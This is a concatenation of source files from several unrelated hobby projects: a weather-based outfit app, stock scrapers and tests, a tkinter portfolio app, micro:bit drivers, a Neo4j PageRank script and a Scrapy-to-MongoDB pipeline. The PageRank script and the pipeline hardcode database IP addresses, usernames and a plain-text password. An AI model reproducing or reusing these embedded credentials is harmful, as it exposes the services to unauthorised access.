half_length = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Athletic Shorts"]
weather = ["Thunderstorm", "Drizzle", "Rain", "Snow", "Atmosphere", "Clear", "Clouds"]
return render_template('outfits.html', city = submitted_city, result = result, randomInt = random_num, coldFootwear = cold_footwear,
coldBottoms = cold_bottoms, coldTop = cold_top, coldAccessories = cold_accessories,
mildFootwear = mild_footwear, mildTop = mild_top, mildAccessories = mild_accessories, mildBottoms = mild_bottoms,
hotFootwear = hot_footwear, hotTop = hot_top, hotAccessories = hot_accessories, hotBottoms = hot_bottoms,
jacketsIcon = jackets, tShirtIcon = t_shirt, longSleeveIcon = long_sleeve_shirt, bootsIcon = boots,
joggersIcon = joggers, sandalsIcon = sandals, miscShoes = miscellanouse_shoes, weather = weather, longPants = full_length,
shortPants = half_length)
else:
submitted_city = session.get('submitted_city', None)
result = m.getWeather(submitted_city)
random.seed(datetime.now())
random_num = random.randint(0, 4)
cold_footwear = ["Boots", "Hiking Boots", "Uggs", "Winter Moccasins", "Leather Shoes"]
cold_top = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat"]
cold_accessories = ["Scarf", "Thermal Base Layers"]
cold_bottoms = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis"]
mild_footwear = ["Running Shoes", "Dress Shoes", "Slip-On Casual Shoes", "Slides", "Heels"]
mild_top = ["T-Shirt", "Long-Sleeve Shirt", "Light Sweatshirt", "Jean Jacket", "Dress Shirt"]
mild_accessories = ["Baseball Cap", "Headband", "Bucket Hat", "Watch"]
mild_bottoms = ["Sweatpants", "Long Skirt", "Jeans", "Cargo Pants", "Dress Pants", "Leggings"]
hot_footwear = ["Flip-Flops", "Sandals", "Slides", "Running Shoes", "Slip-On Casual Shoes"]
hot_top = ["Tank Top", "T-Shirt", "Undershirt", "Polo", "Blouse"]
hot_accessories = ["Fan", "Water Bottle", "Sunscreen", "Sunglasses"]
hot_bottoms = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Trackpants", "Athletic Shorts"]
jackets = ["Jacket", "Parka", "Overcoat", "Jacket Shell", "Fur Coat", "Jean Jacket"]
t_shirt = ["T-Shirt", "Tank Top", "Undershirt", "Polo"]
long_sleeve_shirt = ["Long-Sleeve Shirt", "Light Sweatshirt", "Dress Shirt", "Blouse"]
boots = ["Boots", "Hiking Boots", "Uggs", "Leather Shoes"]
joggers = ["Running Shoes", "Slip-On Casual Shoes"]
sandals = ["Slides", "Flip-Flops", "Sandals"]
miscellanouse_shoes = ["Winter Moccasins", "Dress Shoes", "Heels"]
full_length = ["Jeans", "Sweatpants", "Leggings", "Jeggings", "Khakis", "Long Skirt", "Cargo Pants", "Dress Pants", "Trackpants"]
half_length = ["Short Skirt", "Cargo Shorts", "Jean Shorts", "Athletic Shorts"]
weather = ["Thunderstorm", "Drizzle", "Rain", "Snow", "Atmosphere", "Clear", "Clouds"]
return render_template('outfits.html', city = submitted_city, result = result, randomInt = random_num, coldFootwear = cold_footwear,
coldBottoms = cold_bottoms, coldTop = cold_top, coldAccessories = cold_accessories,
mildFootwear = mild_footwear, mildTop = mild_top, mildAccessories = mild_accessories, mildBottoms = mild_bottoms,
hotFootwear = hot_footwear, hotTop = hot_top, hotAccessories = hot_accessories, hotBottoms = hot_bottoms,
jacketsIcon = jackets, tShirtIcon = t_shirt, longSleeveIcon = long_sleeve_shirt, bootsIcon = boots,
joggersIcon = joggers, sandalsIcon = sandals, miscShoes = miscellanouse_shoes, halfBottomsIcon = half_length,
fullBottomsIcon = full_length, weather = weather)
if __name__ == '__main__':
app.run(debug=False)
``` |
{
"source": "85599/TakeStock",
"score": 4
} |
#### File: TakeStock/src/QuarterlyReport.py
```python
__author__ = '<NAME>'
import datetime
import re
import bs4
import requests
def main():
pass
timeout = 3
def get_share_price(ticker=''):
"""
This function gets the share price for the given ticker symbol. It performs a request to the
nasdaq url and parses the response to find the share price.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the earnings date
"""
try:
earnings_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(earnings_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
return '$' + soup.find('span', {'data-reactid': '50'}).text
except:
return 'No Data Found'
def get_earnings_date(ticker=''):
"""
This function gets the earnings date for the given ticker symbol. It performs a request to the
zacks url and parses the response to find the earnings date.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the earnings date
"""
try:
earnings_url = 'https://www.zacks.com/stock/quote/' + ticker.upper()
request = requests.get(earnings_url, timeout=timeout, headers={
'User-Agent': 'Mozilla'
})
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
return soup.find('section', {'id': 'stock_key_earnings'}).find('table', attrs={'abut_bottom'}).find('tbody').findAll(
'tr')[4].findAll('td')[1].text.replace('*AMC', '')
except:
return 'No Data Found'
def get_fifty_two_week_high_low(ticker=''):
"""
This function gets the fifty-two week high and lows for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the fifty-two week high and low.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the fifty two week high and low
"""
try:
earnings_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(earnings_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
# TODO replace magic string with reasonable/free API call
rows = soup.findAll('tr')
high, low = 0, 0
for row in rows:
if '52 Week High' in row.text:
high = row.contents[1].contents[0]
for row in rows:
if '52 Week Low' in row.text:
low = row.contents[1].contents[0]
return high + 'H ' + low + 'L'
except:
return 'No Data Found'
def get_trailing_pe_ratio(ticker=''):
"""
This function gets the trailing PE ratio for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the trailing PE ratio.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the trailing PE ratio
"""
try:
key_stats_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(key_stats_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find(text=re.compile('Trailing P/E')).findNext('td').text
except:
return 'No Data Found'
def get_peg_ratio(ticker=''):
"""
This function gets the PEG ratio for the given ticker symbol. It performs a request to the
Yahoo url and parses the response to find the PEG ratio.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the PEG ratio
"""
try:
key_stats_url = 'https://finance.yahoo.com/q/ks?s=' + ticker.lower() + '+Key+Statistics'
request = requests.get(key_stats_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find(text=re.compile('PEG Ratio')).findNext('td').text
except:
return 'No Data Found'
def get_rsi(ticker=''):
"""
This function gets the rsi for the given ticker symbol. It performs a request to the
nasdaq url and parses the response to find the rsi.
:param ticker: The stock symbol/ticker to use for the lookup
:return: String containing the rsi
"""
try:
rsi_url = 'https://charting.nasdaq.com/ext/charts.dll?2-1-14-0-0-512-03NA000000' + ticker.upper() \
+ '-&SF:1|27-SH:27=10-BG=FFFFFF-BT=0-WD=635-HT=395--XTBL-'
request = requests.get(rsi_url, timeout=timeout)
soup = bs4.BeautifulSoup(request.text, 'html.parser')
return soup.find_all('td', class_="DrillDownData")[1].text
except:
return 'No Data Found'
# def get_past_consensus_performance(ticker=''):
# TODO finish implementation
# """
# This function gets the past performance versus analyst consensus for the given ticker symbol.
# It performs a request to the nasdaq url and parses the response to get the data
# :param ticker: The stock symbol/ticker to use for the lookup
# :return: String containing the performance against consensus for past
# """
# try:
# earnings_url = 'https://www.nasdaq.com/symbol/' + ticker.lower() + '/earnings-surprise'
# request = requests.get(earnings_url)git
# soup = bs4.BeautifulSoup(request.text, 'html.parser')
# # tag = soup.find(text=re.compile(''))
# # return tag[tag.index(':') + 1:].strip()
# except:
# return 'No Data Found'
def get_stocks(tickers=None):
"""
This function creates a list of Stock objects.
"""
stocks = []
for ticker in tickers:
stocks.append(
Stock(price=get_share_price(ticker), earnings_date=get_earnings_date(ticker=ticker),
ticker=ticker, pe_ratio=get_trailing_pe_ratio(ticker), peg_ratio=get_peg_ratio(ticker),
rsi=get_rsi(ticker=ticker), fifty_two=get_fifty_two_week_high_low(ticker=ticker)))
return stocks
class Stock:
"""
Defines a stock.
"""
def __init__(self, price=0, earnings_date='', ticker='', pe_ratio='', peg_ratio='', rsi='', fifty_two=''):
self.price = price
self.earnings_date = earnings_date
self.earnings_soon = False
if self.earnings_date:
if self.earnings_date != 'No Data Found':
dayStart = self.earnings_date[self.earnings_date.index('/') + 1:]
day = dayStart[:dayStart.index('/')]
earnings_date = datetime.date(year=int(self.earnings_date[len(self.earnings_date) - 2:]),
month=int(self.earnings_date[0:2].replace('/', '')),
day=int(day))
if 0 <= abs((earnings_date - datetime.date.today()).days) <= 7:
self.earnings_soon = True
self.ticker = ticker
self.pe_ratio = pe_ratio
self.peg_ratio = peg_ratio
self.rsi = rsi
self.fifty_two = fifty_two
if __name__ == "__main__":
# If the script is being invoked directly, run the main method.
main()
```
#### File: TakeStock/test/test_QuarterlyReport.py
```python
import unittest
from src import QuarterlyReport
testing_ticker = 'AAPL'
class QuarterlyReportTest(unittest.TestCase):
def test_get_share_price(self):
share_price = QuarterlyReport.get_share_price(testing_ticker)
self.assertIsNotNone(share_price)
self.assertIn('$', share_price)
def test_get_earnings_date(self):
self.assertIsNotNone(QuarterlyReport.get_earnings_date(testing_ticker))
def test_get_fifty_two_week_high_low(self):
hi_low = QuarterlyReport.get_fifty_two_week_high_low(testing_ticker)
self.assertIsNotNone(hi_low)
self.assertIn('H', hi_low)
self.assertIn('L', hi_low)
def test_get_trailing_pe_ratio(self):
pe = QuarterlyReport.get_trailing_pe_ratio(testing_ticker)
self.assertIsNotNone(pe)
self.assertTrue(is_numeric(float(pe)))
def test_get_peg_ratio(self):
peg = QuarterlyReport.get_peg_ratio(testing_ticker)
self.assertIsNotNone(peg)
self.assertTrue(is_numeric(float(peg)))
def test_get_rsi(self):
rsi = QuarterlyReport.get_rsi(testing_ticker)
self.assertIsNotNone(rsi)
self.assertTrue(is_numeric(float(rsi)))
def is_numeric(obj):
attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
return all(hasattr(obj, attr) for attr in attrs)
if __name__ == '__main__':
unittest.main()
```
#### File: TakeStock/test/test_TakeStock.py
```python
import unittest
import time
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
from src.TakeStock import *
class MyFormTest(unittest.TestCase):
def test_defaults(self):
ticker = 'aapl'
harness = test_harness()
form = MyForm()
self.assertEqual(form.ticker_label.text(), "Ticker Entry")
QTest.keyClicks(form.ticker_entry, ticker)
QTest.mouseClick(form.search_tickers_button, Qt.LeftButton)
# Wait 10 seconds before timing out
trys = 0
while trys < 10:
trys += 1
time.sleep(1)
if form.results_table.item(0, 0) is not None:
break
self.assertEquals(form.results_table.item(0, 0).text(), ticker)
```
#### File: TakeStock/test/test_TakeStock_Reporter.py
```python
import unittest
import getopt
import sys
from src import TakeStock_Reporter
class TakeStockReporterTest(unittest.TestCase):
def test_get_results(self):
test_ticker = 'AAPL'
result = TakeStock_Reporter.get_results(tickers=[test_ticker])[0]
self.assertIsNotNone(result)
self.assertEqual(result.price[0], '$')
self.assertGreater(float(result.price[1:]), 0)
self.assertGreater(float(result.rsi), 0)
self.assertIsNotNone(result.fifty_two)
self.assertIsNotNone(result.pe_ratio)
self.assertIsNotNone(result.peg_ratio)
if result.earnings_soon:
self.assertIsNotNone(result.earnings_date)
def test_opts(self):
# Override existing args for testing
sys.argv[1] = '-v'
sys.argv[2] = '-f'
sys.argv.append('-t AAPL')
sys.argv.append('-i')
sys.argv.append('-g')
sys.argv.append('-z')
sys.argv.append('-t AAPL')
TakeStock_Reporter.tickers = ['\'AAPL\'']
TakeStock_Reporter.main()
self.assertTrue(TakeStock_Reporter.verbose)
self.assertTrue(TakeStock_Reporter.fifty_two)
self.assertTrue(TakeStock_Reporter.rsi)
self.assertTrue(TakeStock_Reporter.pe_ratio)
self.assertTrue(TakeStock_Reporter.peg_ratio)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "85599/TharMax",
"score": 3
} |
#### File: 85599/TharMax/balance.py
```python
import pickle
import tkinter as tk
from tkinter import messagebox
class Portfolio:
def __init__(self, username, balance):
self.username = username
self.balance = balance
self.stock_list = {}
def add_balance_util(a, b):
s = int(b.get())
a.balance += s
filename = 'user_data/' + a.username + '.pkl'
pickle_out = open(filename, 'wb')
pickle.dump(a, pickle_out)
pickle_out.close()
messagebox.showinfo("Confirmation Message", str(s) + " was added to your account.")
def add_balance(x):
add_balance_window = tk.Tk()
add_balance_window.title('Adding balance to your account!')
add_balance_window.geometry('400x200')
add_balance_frame = tk.Frame(add_balance_window)
add_balance_frame.pack(side='top', fill='x')
add_balance_label = tk.Label(add_balance_frame, text='Enter the amount to add ')
add_balance_label.pack(side='left')
add_balance_entry = tk.Entry(add_balance_frame)
add_balance_entry.pack(side='left')
add_balance_button = tk.Button(add_balance_window, text='Ok',
command=lambda a=x, b=add_balance_entry: add_balance_util(a, b))
add_balance_button.pack(side='bottom', fill='x')
#Main function of this module starts from here hence the name start LOL. Username passed as user from home function
def start(user):
temp = Portfolio('', 0)
filename = 'user_data/' + user + '.pkl'
file = open(filename, 'rb')
temp = pickle.load(file)
#closed the original loaded pickle user file.
file.close()
# temp has temporary variables extracted from pickled files. Successfully printed values.
# print(temp.username)
# print(temp.balance)
# print(temp.stock_list)
#Opening a new window layout
balance_window = tk.Tk()
balance_window.title('Your Account information!')
balance_window.geometry('300x300')
exit_button = tk.Button(balance_window, text='Exit', command=balance_window.destroy)
exit_button.pack(side='bottom', fill='x')
#Passing temp object as an argument (x) to permanently modify and write new balance value.
balance_button = tk.Button(balance_window, text='Add Balance', command=lambda x=temp: add_balance(x))
balance_button.pack(side='bottom', fill='x')
balance_label = tk.Label(balance_window, text='Your current balance is Rs ' + str(temp.balance))
balance_label.pack(side='bottom', fill='x')
balance_window.mainloop()
```
#### File: 85599/TharMax/sell.py
```python
import pickle
import tkinter as tk
import requests
from bs4 import BeautifulSoup
from tkinter import messagebox
class Portfolio:
def __init__(self, username, balance):
self.username = username
self.balance = balance
self.stock_list = {}
def on_sell_util(a, b, c, d):
unit = int(b.get())
#Unit must be less than the quantity available in the portpolio
if unit > a.stock_list[d]:
messagebox.showinfo('Cannot sell, since you \nquantity entered was more \nthan what you have!')
else:
# Balance update
a.balance = a.balance + (unit * c)
# Portfolio update
a.stock_list[d] -= unit
# Deleting the stock if it's quantity falls to 0
if a.stock_list[d] == 0:
del a.stock_list[d]
filename = 'user_data/' + a.username + '.pkl'
file = open(filename, 'wb')
# Storing updated values in pickled database.
pickle.dump(a, file)
file.close()
success_text = 'Congratulations! \nYou have sold ' + str(unit) + ' of ' + d
messagebox.showinfo(success_text)
def on_sell_func(user, y):
#Gets the stock entered
my_stock = y.get()
#Loads the current user portfolio
temp = Portfolio('', 0)
filename = 'user_data/' + user + '.pkl'
file = open(filename, 'rb')
temp = pickle.load(file)
if my_stock not in temp.stock_list:
messagebox.showinfo('You do not own any units of ' + my_stock)
else:
#print('You do have this stock then. Let us sell it.')
try:
url = 'https://www.screener.in/company/' + my_stock
response = requests.get(url)
data = response.text
except requests.exceptions.RequestException as exp:
print(exp)
soup = BeautifulSoup(data, 'lxml')
data_items = soup.findAll('b')[1:2]
stock_data = [item.text for item in data_items]
current_price = stock_data[0]
current_price = current_price.replace(',', '')
#sanitazied current price value in readable format.
current_price = int(float(current_price))
#Created main window for selling function
on_sell_window = tk.Tk()
on_sell_window.geometry('400x200')
on_sell_window.title('Confirmation for selling ' + my_stock)
on_sell_frame = tk.Frame(on_sell_window)
on_sell_frame.pack(side='top')
quantity_label = tk.Label(on_sell_frame, text='Select quantity to sell ')
quantity_label.pack(side='left')
on_sell_entry = tk.Entry(on_sell_frame)
on_sell_entry.pack(side='left')
on_sell_frame.pack(side='top')
on_sell_button = tk.Button(on_sell_window, text='Sell now',
command=lambda a=temp, b=on_sell_entry, c=current_price, d=my_stock: on_sell_util(a, b,
c, d))
on_sell_button.pack(side='bottom')
on_sell_window.mainloop()
def start(user):
sell_window = tk.Tk()
sell_window.title('Sell a stock!')
sell_window.geometry('450x200')
sell_frame = tk.Frame(sell_window)
sell_label = tk.Label(sell_frame, text='Enter a stock to sell')
sell_label.pack(side='left')
sell_entry = tk.Entry(sell_frame)
sell_entry.pack(side='left')
sell_frame.pack(side='top')
sell_button = tk.Button(sell_window, text='Sell this stock', command=lambda x=user, y=sell_entry: on_sell_func(x, y))
sell_button.pack(side='bottom')
sell_window.mainloop()
``` |
{
"source": "855team/__Pedia-Search__",
"score": 3
} |
#### File: pagerank/impl/pagerank.py
```python
from py2neo import Graph, Node, Relationship
from py2neo.matching import *
import networkx as nx
def calcPR():
# print('start')
# fo = open("graph.txt", "w")
graph = Graph('bolt://192.168.3.11:10087', auth=('neo4j', 'pedia_search'))
G = nx.DiGraph()
node_matcher = NodeMatcher(graph)
nodes = node_matcher.match('Entry').all()
for node in nodes:
G.add_node(node['page_id'])
print("node page_id: ",node['page_id'])
print("number of nodes: ",G.number_of_nodes())
relationships = graph.match(nodes=None, r_type= 'linkTo', limit=None).all()
i = 0
print('start loop')
for relationship in relationships:
i = i + 1
print(i)
print(relationship)
start = relationship.start_node['page_id']
end = relationship.end_node['page_id']
print('edge: ',start,' -> ',end)
G.add_edge(*(start,end))
print('start pagerank')
result = nx.pagerank(G, alpha=0.85, personalization=None, max_iter=20000, tol=1e-06, weight='weight', dangling=None)
print(result)
print(sorted(result.items(), key=lambda kv: (kv[1], kv[0])))
i = 0
transaction = graph.begin()
for cur_page_id in result:
i = i + 1
weight = result[cur_page_id]
print("node:",i,cur_page_id,weight)
matcher = NodeMatcher(graph)
node = matcher.match(page_id = cur_page_id).first()
# 操作
node['weight'] = weight # 修改weight
transaction.push(node)
transaction.commit()
# # 构建空图
# G=nx.DiGraph()
# # 向图中添加节点
# pages = ["1","2","3","4"]
# G.add_nodes_from(pages)
#
# # 向图中添加边,可以不添加节点,直接添加边
# G.add_edges_from([('1','2'), ('1','4'),('1','3'), ('4','1'),('2','3'),('2','4'),('3','1'),('4','3')])
#
#
#
#
# # 另一种方式,可以改用pagerank或pagerank_numpy
# result = nx.pagerank_scipy(G, alpha=0.85, personalization=None, max_iter=100, tol=1e-06, weight='weight', dangling=None)
# print(result)
calcPR()
```
#### File: wiki/wiki/pipelines.py
```python
import pymongo
import csv
from itemadapter import ItemAdapter
from twisted.internet.threads import deferToThread
from py2neo import Graph, Node, Relationship
class WikiPipeline:
def open_spider(self, spider):
headers = ['page_id:ID', 'title', 'weight']
# self.node_csv_file = open('./dump/test_node.csv', 'w+')
# self.relation_csv_file = open('./dump/test_relation.csv', 'w+')
# self.node_csv = csv.writer(self.node_csv_file)
self.mongo_client = pymongo.MongoClient('mongodb://pedia_search_mongo_rw:[email protected]:10086/pedia_search')
def close_spider(self, spider):
open('a.txt', 'w')
print('\n\nclosing!!!!!!!!!!!\n\n')
self.mongo_client.close()
def process_item(self, item, spider):
item_dict = ItemAdapter(item).asdict()
# MongoDB Server
# client = pymongo.MongoClient('mongodb://pedia_search_mongo_rw:[email protected]:10086/pedia_search')
mongo = self.mongo_client['pedia_search']['pedia_search']
mongo.insert_one(item_dict)
#
# Neo4j Server
# graph = Graph('bolt://172.16.17.32:10087', auth=('neo4j', 'pedia_search'))
# transaction = graph.begin()
#
# node_from = Node('Entry', page_id=item_dict['page_id'], title=item_dict['title'], weight=0.0)
#
# for item in item_dict['linked_items']:
# node_to = Node('Entry', page_id=item['page_id'], title=item['title'], weight=0.0)
# transaction.merge(Relationship(node_from, 'linkTo', node_to), primary_label='Entry', primary_key='page_id')
#
# transaction.commit()
# return item
return {'page_id:ID': item_dict['page_id'], 'title': item_dict['title'], 'weight': 0.0}
``` |
{
"source": "859462029/microbit-lib",
"score": 2
} |
#### File: OLED/OLED12864_I2C_6x8/OLED12864_I2C_6x8.py
```python
from microbit import i2c
import gc
cmd = [
[0xAE],
[0xA4],
[0xD5, 0xF0],
[0xA8, 0x3F],
[0xD3, 0x00],
[0 | 0x0],
[0x8D, 0x14],
[0x20, 0x00],
[0x21, 0, 127],
[0x22, 0, 63],
[0xa0 | 0x1],
[0xc8],
[0xDA, 0x12],
[0x81, 0xCF],
[0xd9, 0xF1],
[0xDB, 0x40],
[0xA6],
[0xd6, 0],
[0xaf]
]
# ' ' - '~' 0x20 - 0x7F
Font_5x7 = bytes(b'\
\x00\x00\x00\x00\x00\
\x00\x00\x5F\x00\x00\
\x00\x07\x00\x07\x00\
\x14\x7F\x14\x7F\x14\
\x24\x2A\x07\x2A\x12\
\x23\x13\x08\x64\x62\
\x37\x49\x55\x22\x50\
\x00\x05\x03\x00\x00\
\x00\x1C\x22\x41\x00\
\x00\x41\x22\x1C\x00\
\x08\x2A\x1C\x2A\x08\
\x08\x08\x3E\x08\x08\
\x00\x50\x30\x00\x00\
\x08\x08\x08\x08\x08\
\x00\x60\x60\x00\x00\
\x20\x10\x08\x04\x02\
\x3E\x51\x49\x45\x3E\
\x00\x42\x7F\x40\x00\
\x42\x61\x51\x49\x46\
\x21\x41\x45\x4B\x31\
\x18\x14\x12\x7F\x10\
\x27\x45\x45\x45\x39\
\x3C\x4A\x49\x49\x30\
\x01\x71\x09\x05\x03\
\x36\x49\x49\x49\x36\
\x06\x49\x49\x29\x1E\
\x00\x36\x36\x00\x00\
\x00\x56\x36\x00\x00\
\x00\x08\x14\x22\x41\
\x14\x14\x14\x14\x14\
\x41\x22\x14\x08\x00\
\x02\x01\x51\x09\x06\
\x32\x49\x79\x41\x3E\
\x7E\x11\x11\x11\x7E\
\x7F\x49\x49\x49\x36\
\x3E\x41\x41\x41\x22\
\x7F\x41\x41\x22\x1C\
\x7F\x49\x49\x49\x41\
\x7F\x09\x09\x01\x01\
\x3E\x41\x41\x51\x32\
\x7F\x08\x08\x08\x7F\
\x00\x41\x7F\x41\x00\
\x20\x40\x41\x3F\x01\
\x7F\x08\x14\x22\x41\
\x7F\x40\x40\x40\x40\
\x7F\x02\x04\x02\x7F\
\x7F\x04\x08\x10\x7F\
\x3E\x41\x41\x41\x3E\
\x7F\x09\x09\x09\x06\
\x3E\x41\x51\x21\x5E\
\x7F\x09\x19\x29\x46\
\x46\x49\x49\x49\x31\
\x01\x01\x7F\x01\x01\
\x3F\x40\x40\x40\x3F\
\x1F\x20\x40\x20\x1F\
\x7F\x20\x18\x20\x7F\
\x63\x14\x08\x14\x63\
\x03\x04\x78\x04\x03\
\x61\x51\x49\x45\x43\
\x00\x00\x7F\x41\x41\
\x02\x04\x08\x10\x20\
\x41\x41\x7F\x00\x00\
\x04\x02\x01\x02\x04\
\x40\x40\x40\x40\x40\
\x00\x01\x02\x04\x00\
\x20\x54\x54\x54\x78\
\x7F\x48\x44\x44\x38\
\x38\x44\x44\x44\x20\
\x38\x44\x44\x48\x7F\
\x38\x54\x54\x54\x18\
\x08\x7E\x09\x01\x02\
\x08\x14\x54\x54\x3C\
\x7F\x08\x04\x04\x78\
\x00\x44\x7D\x40\x00\
\x20\x40\x44\x3D\x00\
\x00\x7F\x10\x28\x44\
\x00\x41\x7F\x40\x00\
\x7C\x04\x18\x04\x78\
\x7C\x08\x04\x04\x78\
\x38\x44\x44\x44\x38\
\x7C\x14\x14\x14\x08\
\x08\x14\x14\x18\x7C\
\x7C\x08\x04\x04\x08\
\x48\x54\x54\x54\x20\
\x04\x3F\x44\x40\x20\
\x3C\x40\x40\x20\x7C\
\x1C\x20\x40\x20\x1C\
\x3C\x40\x30\x40\x3C\
\x44\x28\x10\x28\x44\
\x0C\x50\x50\x50\x3C\
\x44\x64\x54\x4C\x44\
\x00\x08\x36\x41\x00\
\x00\x00\x7F\x00\x00\
\x00\x41\x36\x08\x00\
\x02\x01\x02\x04\x02\
')
ADDR = 0x3C
gc.collect()
screen = bytearray(1025)
screen[0] = 0x40
class OLED12864_I2C_6x8():
def __init__(self):
self.x = 0
self.y = 0
for c in cmd:
self.command(c)
def command(self, c):
i2c.write(ADDR, b'\x00' + bytearray(c))
def set_pos(self, col=0, page=0):
self.command([0xb0 | page])
c1, c2 = col & 0x0F, col >> 4
self.command([0x00 | c1])
self.command([0x10 | c2])
def pixel(self, x, y, color=1):
page, shift_page = divmod(y, 8)
ind = x + page * 128 + 1
b = screen[ind] | (1 << shift_page) if color else screen[ind] & ~ (1 << shift_page)
screen[ind] = b
self.set_pos(x, page)
i2c.write(ADDR, bytearray([0x40, b]))
def invert(self, v=1):
n = 0xa7 if v else 0xa6
self.command([n])
def on(self):
self.command([0xAF])
def off(self):
self.command([0xAE])
def clear(self, c=0):
global screen
for i in range(1, 1025):
screen[i] = 0
self.draw()
def draw(self):
self.set_pos()
i2c.write(ADDR, screen)
def char(self, ch, x=0, y=0, c=1):
ind = x + y * 128 + 1
n = (min(127, max(ord(ch), 32)) -32)*5
for i in range(5):
screen[ind+i] = Font_5x7[n+i] if c else Font_5x7[n+i]^0xFF
screen[ind+5] = 0 if c else 0xFF
self.set_pos(x, y)
i2c.write(ADDR, b'\x40' + screen[ind:ind + 6])
def print(self, s, c=1, newline=1):
x, y = self.x, self.y
for i in range(len(s)):
self.char(s[i], x, y, c)
x += 6
if x > 125:
x = 0; y = (y+1)%8
if newline:
x = 0; y = (y+1)%8
self.x, self.y = x, y
```
#### File: sensor/bmp180/BMP180.py
```python
from microbit import *
BMP180_I2C_ADDR = 0x77
class BMP180():
def __init__(self):
self.AC1 = self.short(self._g2r(0xAA))
self.AC2 = self.short(self._g2r(0xAC))
self.AC3 = self.short(self._g2r(0xAE))
self.AC4 = self._g2r(0xB0)
self.AC5 = self._g2r(0xB2)
self.AC6 = self._g2r(0xB4)
self.B1 = self.short(self._g2r(0xB6))
self.B2 = self.short(self._g2r(0xB8))
self.MB = self.short(self._g2r(0xBA))
self.MC = self.short(self._g2r(0xBC))
self.MD = self.short(self._g2r(0xBE))
self.UT = 0
self.UP = 0
self.T = 0
self.P = 0
self.version = '2.2'
def short(self, dat):
if dat > 32767:
return dat - 65536
else:
return dat
# set reg
def _sr(self, reg, dat):
i2c.write(BMP180_I2C_ADDR, bytearray([reg, dat]))
# get two reg
def _g2r(self, reg):
i2c.write(BMP180_I2C_ADDR, bytearray([reg]))
t = i2c.read(BMP180_I2C_ADDR, 2)
return t[0]*256 + t[1]
# get Temperature and Pressure
def get(self):
# start measure
self._sr(0xF4, 0x2E)
sleep(6)
self.UT = self._g2r(0xF6)
self._sr(0xF4, 0x34)
sleep(6)
self.UP = self._g2r(0xF6)
# calc
X1 = (self.UT - self.AC6) * self.AC5/(1<<15)
X2 = self.MC * (1<<11) / (X1 + self.MD)
B5 = X1 + X2
self.T = (B5 + 8)/160
B6 = B5 - 4000
X1 = (self.B2 * (B6*B6/(1<<12))) / (1<<11)
X2 = (self.AC2 * B6)/(1<<11)
X3 = X1 + X2
B3 = ((self.AC1*4+X3) + 2)/4
X1 = self.AC3 * B6 / (1<<13)
X2 = (self.B1 * (B6*B6/(1<<12))) / (1<<16)
X3 = (X1 + X2 + 2)/4
B4 = self.AC4 * (X3 + 32768)/(1<<15)
B7 = (self.UP-B3) * 50000
if B7 < 0x80000000:
p = (B7*2)/B4
else:
p = (B7/B4) * 2
X1 = (p/(1<<8))*(p/(1<<8))
X1 = (X1 * 3038)/(1<<16)
X2 = (-7357*p)/(1<<16)
self.P = p + (X1 + X2 + 3791)/16
return [self.T, self.P]
# get Temperature in Celsius
def Temperature(self):
self.get()
return self.T
# get Pressure in Pa
def Pressure(self):
self.get()
return self.P
# Calculating absolute altitude
def Altitude(self):
self.get()
return 44330*(1-(self.P/101325)**(1/5.255))
```
#### File: sensor/HCSR04/hcsr04.py
```python
from microbit import *
from time import sleep_us
from machine import time_pulse_us
def distance(tp, ep):
ep.read_digital()
tp.write_digital(1)
sleep_us(10)
tp.write_digital(0)
ts = time_pulse_us(ep, 1, 5000)
if ts > 0: return ts * 17 // 100
return ts
``` |
{
"source": "85-hub/callaborate",
"score": 3
} |
#### File: 85-hub/callaborate/app.py
```python
from datetime import datetime, timedelta
import hashlib
import os
import urllib
from functools import wraps
from flask import Flask, jsonify, request
from flask.ext.cors import cross_origin
import requests
import calls
import config
import db
from db import store_event, get_next_callee, CALLEES
app = Flask(__name__, static_folder='static', static_url_path='')
SECRET = config.get('SECRET')
def create_key(index):
"""Hash a secret to create a key signature for an index"""
s = hashlib.sha1()
s.update('{}:{}'.format(SECRET, index))
return s.hexdigest()
def check_key(index, key):
return create_key(index) == key
def timeblock(inner_fn):
@wraps(inner_fn)
def outer_fn(*args, **kwargs):
utc_offset_hours = int(config.get('TIMEZONE_UTC_OFFSET'))
utc_offset = timedelta(seconds=60*60*utc_offset_hours)
hour = (datetime.utcnow() + utc_offset).time().hour
call_time_start = int(config.get('CALL_TIME_START', 9)) # open at 9am by default
call_time_end = int(config.get('CALL_TIME_END', 21)) # close at 9pm by default
if hour < call_time_end and hour >= call_time_start:
return inner_fn(*args, **kwargs)
try:
request_data = request.get_json()
except:
request_data = {}
event_data = {
'path': request.path,
'endpoint': request.endpoint,
'request_data': request_data
}
store_event('after_hours', event_data)
return jsonify(error='after_hours')
return outer_fn
def build_callee(raw_callee):
r = lambda x: x
t = lambda x: x.title()
mapping = {
'first_name': ('firstName', t),
'last_name': ('lastName', t),
'residential_city': ('residentialCity', r),
}
return dict((k_out,l(raw_callee[k_in])) for k_in, (k_out, l) in mapping.iteritems())
def get_callee():
index, raw_callee = get_next_callee()
callee = build_callee(raw_callee)
callee['id'] = index
callee['key'] = create_key(index)
